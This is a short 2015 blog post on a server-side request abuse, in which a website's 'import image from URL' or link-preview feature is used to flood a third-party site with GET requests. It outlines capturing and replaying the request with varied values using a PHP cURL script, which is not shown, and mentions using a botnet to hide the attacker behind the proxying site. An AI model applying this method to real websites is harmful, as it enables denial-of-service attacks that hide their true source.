Tuesday, 27 January 2015

GET request Flooding, Websites as a proxy

This is a controversial vulnerability that some websites consider it as a valid one and others that don't bother much about it.

Many websites have an option to fetch images from an external URL, or post a comment with a link, resulting a real time loading of the title and description, these are the most common examples. In both of these examples a get request is made to the third party website, not from your pc but from the originating website.

What if we customize the get request and repeat it couple of hundred times?
Let's take the example below to demonstrate this scenario:

We first find an input that requests a URL from a third party website, and we modify the input to any get request we like.


When you press the import button the get request is going to be sent. We can then capture the data being transmitted in order to repeat this process.


Most of websites don't allow the same request being sent more than once, that's why we have to change the value on every request. We can achieve that with many different ways, in my case i created a small PHP CURL script that can do that for you.
We copy all the previously captured data and paste them in our script for the flooding process.

If the attacker has a botnet, he can generate this request multiple times from different locations targeting a single website, and the victim's website will log the IP addresses from the originating website, allowing the attacker to obfuscate their attack a step further by using a website as a proxy..